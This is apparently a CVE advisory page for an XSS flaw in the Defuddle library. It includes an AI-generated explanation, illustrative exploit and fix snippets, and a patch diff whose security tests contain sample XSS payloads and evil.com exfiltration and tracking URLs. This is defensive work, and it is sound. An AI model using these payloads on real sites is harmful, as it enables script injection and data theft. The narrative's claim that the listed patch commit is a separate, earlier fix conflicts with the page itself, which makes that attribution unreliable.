Defuddle: XSS via unescaped string interpolation in _findContentBySchemaText image tag
Description
Defuddle cleans up HTML pages. Prior to version 0.9.0, the _findContentBySchemaText method in src/defuddle.ts interpolates image src and alt attributes directly into an HTML string without escaping. An attacker can use a " in the alt attribute to break out of the attribute context and inject event handlers. This issue has been patched in version 0.9.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Defuddle is an HTML content extraction library vulnerable to XSS via unescaped string interpolation in the `_findContentBySchemaText` method, patched in version 0.9.0.
Vulnerability Overview
CVE-2026-30830 describes a cross-site scripting (XSS) vulnerability in the Defuddle library, which extracts the main content from HTML pages. The flaw resides in the _findContentBySchemaText method in src/defuddle.ts. When constructing the HTML string for an image element, the method interpolates the src and alt attribute values obtained via getAttribute() directly into the string, without any escaping or sanitization [1][4]. Specifically, the code appends the image tag to an html string using a template literal [4]. An attacker can therefore break out of the alt attribute context by including a double-quote character (") in the alt value and inject arbitrary HTML attributes, including event handlers such as onload or onerror [2][4].
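The attribute breakout can be illustrated with a minimal sketch. The function name `buildImgUnsafe` and the sample values are assumptions made for illustration; this is a simplified stand-in for the pattern described above, not Defuddle's actual source.

```typescript
// Illustrative only: a simplified stand-in for the vulnerable pattern,
// not the library's actual code. `buildImgUnsafe` is a hypothetical name.
function buildImgUnsafe(src: string, alt: string): string {
  // Attribute values are pasted into the markup verbatim, with no escaping.
  return `<img src="${src}" alt="${alt}">`;
}

// A double quote inside `alt` closes the attribute early, so the remainder
// is parsed by the browser as a separate attribute.
const craftedAlt = 'photo" onerror="alert(1)';
const unsafeMarkup = buildImgUnsafe("x.jpg", craftedAlt);

console.log(unsafeMarkup);
// prints: <img src="x.jpg" alt="photo" onerror="alert(1)">
```

The resulting string contains a real `onerror` attribute even though the input element only ever had `src` and `alt`.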
Exploitation
To exploit this vulnerability, an attacker must craft a malicious HTML page that triggers the schema text fallback path in Defuddle. This requires the word count of the schema text (from a JSON-LD script) to exceed the word count of the extracted content, which causes Defuddle to use the schema text as the main content [2][4]. The attacker then includes a sibling image element whose alt attribute contains a double quote followed by an event handler. When Defuddle processes this page, the unescaped interpolation produces an `<img>` tag carrying the injected event handler, which executes in the page's context when the image is loaded [4]. The attack does not require authentication or a special network position, as it can be delivered via any HTML content that Defuddle processes [1][3].
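The trigger condition for the fallback path can be sketched as a simple word-count comparison. Both helper names below are hypothetical, and whitespace splitting is an assumption; Defuddle's real word counting may differ.

```typescript
// Hypothetical helpers; the library's own word counting may differ.
function countWords(text: string): number {
  const trimmed = text.trim();
  // Split on runs of whitespace; an empty string counts as zero words.
  return trimmed === "" ? 0 : trimmed.split(/\s+/).length;
}

// The fallback is taken only when the schema text is longer (in words)
// than what the content scorer extracted.
function schemaFallbackTriggers(schemaText: string, extractedText: string): boolean {
  return countWords(schemaText) > countWords(extractedText);
}

const longSchemaText = "This is the full post body with enough words to exceed the summary";
const shortExtracted = "Short article summary.";
console.log(schemaFallbackTriggers(longSchemaText, shortExtracted));
```

This mirrors the setup used in the project's tests, where a short `<article>` sits beside a longer block containing the schema text.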
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the application using Defuddle. This can lead to theft of sensitive data, session hijacking, or other client-side attacks. The vulnerability is distinct from a previous sanitization bypass (fixed in commit f154cb7): here the injection occurs during string construction rather than in the DOM, so _stripUnsafeElements cannot catch it [4]. NVD has not yet assigned a CVSS score, but the advisory describes it as a high-severity XSS issue [3][4].
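Why a DOM-level pass misses this can be shown with a simplified model. Here an element is represented as a plain attribute map, and `stripEventHandlerAttributes` is a hypothetical stand-in for an attribute-name filter; none of this is the library's code.

```typescript
type Attributes = Record<string, string>;

// Simplified model of a DOM-level sanitizer: it drops attributes whose
// *name* starts with "on" and never inspects attribute values.
function stripEventHandlerAttributes(attrs: Attributes): Attributes {
  const kept: Attributes = {};
  for (const [name, value] of Object.entries(attrs)) {
    if (!name.toLowerCase().startsWith("on")) kept[name] = value;
  }
  return kept;
}

// In the parsed document, the payload is just text inside a single alt value.
const parsedImg: Attributes = {
  src: "x.jpg",
  alt: 'photo" onerror="alert(1)',
  onclick: "steal()",
};

const sanitized = stripEventHandlerAttributes(parsedImg);
const altValue = sanitized["alt"] ?? "";
const srcValue = sanitized["src"] ?? "";

// Rebuilding markup by naive interpolation reintroduces a live attribute.
const rebuilt = `<img src="${srcValue}" alt="${altValue}">`;
console.log(rebuilt);
```

The real `onclick` attribute is removed, but the `alt` value passes through untouched, and the handler only materializes when the string is rebuilt without escaping.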
Mitigation
The vulnerability has been patched in Defuddle version 0.9.0 [1][3]. Users should upgrade to this version immediately. There are no known workarounds; the fix ensures that attribute values are properly escaped before interpolation [2][4]. The project is actively maintained, and the advisory recommends updating as the primary mitigation [4].
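A minimal sketch of escaping attribute values before interpolation follows. The helper names are hypothetical and the actual patch in 0.9.0 may be implemented differently; this only illustrates the general technique.

```typescript
// Hypothetical helper: escapes characters that are significant inside a
// quoted HTML attribute value. The real fix may differ in detail.
function escapeAttribute(value: string): string {
  return value
    .replace(/&/g, "&amp;") // must run first so later entities are not re-escaped
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function buildImgEscaped(src: string, alt: string): string {
  return `<img src="${escapeAttribute(src)}" alt="${escapeAttribute(alt)}">`;
}

const safeMarkup = buildImgEscaped("x.jpg", 'photo" onerror="alert(1)');
console.log(safeMarkup);
// prints: <img src="x.jpg" alt="photo&quot; onerror=&quot;alert(1)">
```

With the quotes encoded as `&quot;`, the payload stays inside the `alt` value and no new attribute is created. Building the element through DOM APIs and serializing it would be another way to get the same guarantee.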
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| defuddle (npm) | < 0.9.0 | 0.9.0 |
Affected products (2)
Patches (1)
f154cb740ee6: Sanitize `this.doc` after `parseInternal` to prevent the `_findContentBySchemaText` fallback from returning unsanitized HTML containing scripts, event handlers, and other dangerous elements. Strips unsafe elements/attributes while preserving legitimate content like math scripts, media iframes, and video embeds. See #139
2 files changed · +135 −92
src/defuddle.ts (+23 −17, modified)
@@ -101,32 +101,38 @@ export class Defuddle {
   }

   /**
-   * Remove dangerous elements from this.doc: scripts, styles, noscript,
-   * and event-handler attributes. Preserves ld+json and math scripts
-   * since they've already been consumed by parseInternal.
+   * Remove dangerous elements and attributes from this.doc.
+   * Called after parseInternal so that extractors and schema extraction
+   * can still read script tags they depend on.
    */
   private _stripUnsafeElements(): void {
     const body = this.doc.body;
     if (!body) return;

-    // Remove script tags (ld+json and math already consumed by parseInternal)
-    const scripts = body.querySelectorAll('script');
-    for (const el of scripts) el.remove();
-
-    // Remove style elements
-    const styles = body.querySelectorAll('style');
-    for (const el of styles) el.remove();
-
-    // Remove noscript elements
-    const noscripts = body.querySelectorAll('noscript');
-    for (const el of noscripts) el.remove();
-
-    // Remove event handler attributes (onclick, onerror, onload, etc.)
+    // Remove dangerous elements. Iframes are kept — same-origin policy
+    // isolates them, and they're widely used for legitimate media embeds.
+    // Dangerous iframe attributes (srcdoc, javascript: src) are stripped
+    // in the attribute pass below. Math scripts are preserved for LaTeX
+    // content (matching the EXACT_SELECTORS approach).
+    const dangerousElements = body.querySelectorAll(
+      'script:not([type^="math/"]), style, noscript, frame, frameset, object, embed, applet, base'
+    );
+    for (const el of dangerousElements) el.remove();
+
+    // Remove event handler attributes, dangerous URIs, and srcdoc
     const allElements = body.querySelectorAll('*');
     for (const el of allElements) {
       for (const attr of Array.from(el.attributes)) {
-        if (attr.name.toLowerCase().startsWith('on')) {
+        const name = attr.name.toLowerCase();
+        if (name.startsWith('on')) {
           el.removeAttribute(attr.name);
+        } else if (name === 'srcdoc') {
+          el.removeAttribute(attr.name);
+        } else if (['href', 'src', 'action', 'formaction', 'xlink:href'].includes(name)) {
+          const val = attr.value.replace(/[\s\u0000-\u001F]+/g, '').toLowerCase();
+          if (val.startsWith('javascript:') || val.startsWith('data:text/html')) {
+            el.removeAttribute(attr.name);
+          }
         }
       }
     }
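The attribute pass in the diff above can be restated as a standalone predicate, which makes the rules easier to test without a DOM. The function name `isUnsafeAttribute` and the constant `URI_ATTRIBUTES` are assumptions introduced here; the attribute list and the normalizing regular expression are taken from the diff.

```typescript
// Attribute names whose values are treated as URIs (list taken from the diff).
const URI_ATTRIBUTES = ["href", "src", "action", "formaction", "xlink:href"];

// Hypothetical standalone restatement of the attribute rules: returns true
// when the attribute would be removed by the sanitizer pass.
function isUnsafeAttribute(rawName: string, rawValue: string): boolean {
  const name = rawName.toLowerCase();
  if (name.startsWith("on")) return true; // event handlers
  if (name === "srcdoc") return true; // inline iframe documents
  if (URI_ATTRIBUTES.includes(name)) {
    // Strip whitespace and control characters so obfuscated schemes such as
    // " java\tscript:" are normalized before the prefix check.
    const val = rawValue.replace(/[\s\u0000-\u001F]+/g, "").toLowerCase();
    return val.startsWith("javascript:") || val.startsWith("data:text/html");
  }
  return false;
}

console.log(isUnsafeAttribute("href", " javascript:void(0)"));
console.log(isUnsafeAttribute("src", "https://www.youtube.com/embed/abc123"));
```

Note that these rules inspect attribute names and URI schemes only. A payload hidden inside an `alt` value is not flagged, which is why this pass alone does not address CVE-2026-30830.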
tests/schema-fallback.test.ts (+112 −75, modified)
@@ -225,107 +225,144 @@ describe('Schema.org text fallback', () => {
   });
 });

+/**
+ * Security tests for the schema.org text fallback path.
+ *
+ * To trigger the fallback, the schema text word count must exceed the
+ * extracted content word count. We achieve this by putting a short
+ * <article> (which the scorer favors) alongside a longer <div> that
+ * contains the schema text plus dangerous elements.
+ */
 describe('Schema.org text fallback sanitization', () => {
-  test('strips script tags from schema fallback content', () => {
-    const postText = 'This is a social media post with enough words to trigger the schema text fallback path. We need the word count to exceed what the content scorer extracts from the page so the fallback kicks in and searches the DOM.';
+  // Helper: build HTML where the schema fallback triggers and the
+  // matched DOM element contains the given dangerous HTML.
+  function buildSchemaFallbackHtml(dangerousHtml: string): string {
+    const schemaText = 'This is the full post body with enough words to exceed the short article summary that the content scorer will extract. Adding more sentences here to make sure the word count difference is large enough to reliably trigger the schema text fallback path in the parse method.';

-    const html = `
+    return `
       <!DOCTYPE html>
       <html>
       <head>
         <title>Test</title>
         <script type="application/ld+json">
         {
           "@type": "SocialMediaPosting",
-          "text": "${postText}"
+          "text": "${schemaText}"
         }
         </script>
       </head>
       <body>
-        <div class="post">
-          <p>${postText}</p>
-          <script>alert('xss')</script>
+        <article>
+          <h1>Title</h1>
+          <p>Short article summary.</p>
+        </article>
+        <div class="full-post">
+          <p>${schemaText}</p>
+          ${dangerousHtml}
         </div>
       </body>
       </html>`;
+  }

+  test('strips script tags from schema fallback content', () => {
+    const html = buildSchemaFallbackHtml('<script>alert("xss")</script>');
     const doc = createDocument(html);
-    const defuddle = new Defuddle(doc);
-    const result = defuddle.parse();
+    const result = new Defuddle(doc).parse();

-    expect(result.content).toContain('social media post');
+    expect(result.content).toContain('full post body');
     expect(result.content).not.toContain('<script');
     expect(result.content).not.toContain('alert');
   });

   test('strips event handlers from schema fallback content', () => {
-    const postText = 'This post contains an image with a malicious event handler that should be stripped during the schema text fallback. Adding more words here to ensure we exceed the extracted content word count threshold.';
-
-    const html = `
-      <!DOCTYPE html>
-      <html>
-      <head>
-        <title>Test</title>
-        <script type="application/ld+json">
-        {
-          "@type": "SocialMediaPosting",
-          "text": "${postText}"
-        }
-        </script>
-      </head>
-      <body>
-        <div class="post">
-          <p>${postText}</p>
-          <img src="x.jpg" onerror="alert('xss')" onclick="steal()">
-        </div>
-      </body>
-      </html>`;
-
+    const html = buildSchemaFallbackHtml('<img src="x.jpg" onerror="alert(\'xss\')" onclick="steal()">');
     const doc = createDocument(html);
-    const defuddle = new Defuddle(doc);
-    const result = defuddle.parse();
+    const result = new Defuddle(doc).parse();

-    expect(result.content).toContain('malicious event handler');
+    expect(result.content).toContain('full post body');
     expect(result.content).not.toContain('onerror');
     expect(result.content).not.toContain('onclick');
     expect(result.content).not.toContain('alert');
     expect(result.content).not.toContain('steal');
   });

   test('strips style elements from schema fallback content', () => {
-    const postText = 'This post has an embedded style element that could be used for CSS-based attacks or data exfiltration. We need enough words here to trigger the schema text fallback mechanism.';
-
-    const html = `
-      <!DOCTYPE html>
-      <html>
-      <head>
-        <title>Test</title>
-        <script type="application/ld+json">
-        {
-          "@type": "SocialMediaPosting",
-          "text": "${postText}"
-        }
-        </script>
-      </head>
-      <body>
-        <div class="post">
-          <style>.secret { background: url('https://evil.com/steal?data=123') }</style>
-          <p>${postText}</p>
-        </div>
-      </body>
-      </html>`;
-
+    const html = buildSchemaFallbackHtml('<style>.x { background: url("https://evil.com/steal") }</style>');
     const doc = createDocument(html);
-    const defuddle = new Defuddle(doc);
-    const result = defuddle.parse();
+    const result = new Defuddle(doc).parse();

-    expect(result.content).toContain('embedded style element');
+    expect(result.content).toContain('full post body');
     expect(result.content).not.toContain('<style');
     expect(result.content).not.toContain('evil.com');
   });

   test('strips noscript elements from schema fallback content', () => {
-    const postText = 'This post contains a noscript element with potentially dangerous content that should be removed during sanitization. More words to trigger the fallback path reliably.';
+    const html = buildSchemaFallbackHtml('<noscript><img src="https://evil.com/track"></noscript>');
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('<noscript');
+    expect(result.content).not.toContain('evil.com');
+  });
+
+  test('preserves iframes in schema fallback content', () => {
+    const html = buildSchemaFallbackHtml(
+      '<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>' +
+      '<iframe src="https://open.spotify.com/embed/track/xyz"></iframe>'
+    );
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).toContain('youtube.com/embed/abc123');
+    expect(result.content).toContain('spotify.com/embed/track/xyz');
+  });
+
+  test('strips srcdoc attribute from iframes in schema fallback content', () => {
+    const html = buildSchemaFallbackHtml(
+      '<iframe srcdoc="<script>alert(\'xss\')</script>"></iframe>'
+    );
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('srcdoc');
+    expect(result.content).not.toContain('alert');
+  });
+
+  test('strips object and embed elements from schema fallback content', () => {
+    const html = buildSchemaFallbackHtml('<object data="https://evil.com/flash.swf"></object><embed src="https://evil.com/plugin">');
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('<object');
+    expect(result.content).not.toContain('<embed');
+    expect(result.content).not.toContain('evil.com');
+  });
+
+  test('strips javascript: URIs from schema fallback content', () => {
+    const html = buildSchemaFallbackHtml('<a href="javascript:alert(\'xss\')">click me</a><a href=" javascript:void(0)">spaced</a>');
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('javascript:');
+  });
+
+  test('strips data:text/html URIs from schema fallback content', () => {
+    const html = buildSchemaFallbackHtml('<img src="data:text/html,<script>alert(1)</script>">');
+    const doc = createDocument(html);
+    const result = new Defuddle(doc).parse();
+
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('data:text/html');
+  });
+
+  test('strips base tag to prevent URL hijacking', () => {
+    // base tag goes before the article, not inside the dangerous html helper
+    const schemaText = 'This is the full post body with enough words to exceed the short article summary that the content scorer will extract. Adding more sentences here to make sure the word count difference is large enough to reliably trigger the schema text fallback path in the parse method.';

     const html = `
       <!DOCTYPE html>
@@ -335,29 +372,31 @@ describe('Schema.org text fallback sanitization', () => {
         <script type="application/ld+json">
         {
           "@type": "SocialMediaPosting",
-          "text": "${postText}"
+          "text": "${schemaText}"
         }
         </script>
       </head>
       <body>
-        <div class="post">
-          <p>${postText}</p>
-          <noscript><img src="https://evil.com/track"></noscript>
+        <base href="https://evil.com/">
+        <article>
+          <h1>Title</h1>
+          <p>Short article summary.</p>
+        </article>
+        <div class="full-post">
+          <p>${schemaText}</p>
         </div>
       </body>
       </html>`;

     const doc = createDocument(html);
-    const defuddle = new Defuddle(doc);
-    const result = defuddle.parse();
+    const result = new Defuddle(doc).parse();

-    expect(result.content).toContain('noscript element');
-    expect(result.content).not.toContain('<noscript');
-    expect(result.content).not.toContain('evil.com');
+    expect(result.content).toContain('full post body');
+    expect(result.content).not.toContain('<base');
   });

   test('schema text string fallback does not contain HTML injection', () => {
-    // Schema text that contains HTML but no DOM match exists
+    // Schema text that does NOT appear in the DOM → raw text fallback
     const html = `
       <!DOCTYPE html>
       <html>
@@ -376,11 +415,9 @@ describe('Schema.org text fallback sanitization', () => {
       </html>`;

     const doc = createDocument(html);
-    const defuddle = new Defuddle(doc);
-    const result = defuddle.parse();
+    const result = new Defuddle(doc).parse();

-    // The raw schema text is used as content — verify it doesn't execute
-    // (schema text is plain text, not DOM HTML, so script tags are literal text)
+    // Raw schema text is used as content (plain text, not DOM HTML)
     expect(result.content).toContain('Safe text');
   });
 });
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (4)
- github.com/advisories/GHSA-5mq8-78gm-pjmq (ghsa, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2026-30830 (ghsa, ADVISORY)
- github.com/kepano/defuddle/commit/f154cb740ee603431b69638273af737a27156df9 (ghsa, x_refsource_MISC, WEB)
- github.com/kepano/defuddle/security/advisories/GHSA-5mq8-78gm-pjmq (ghsa, x_refsource_CONFIRM, WEB)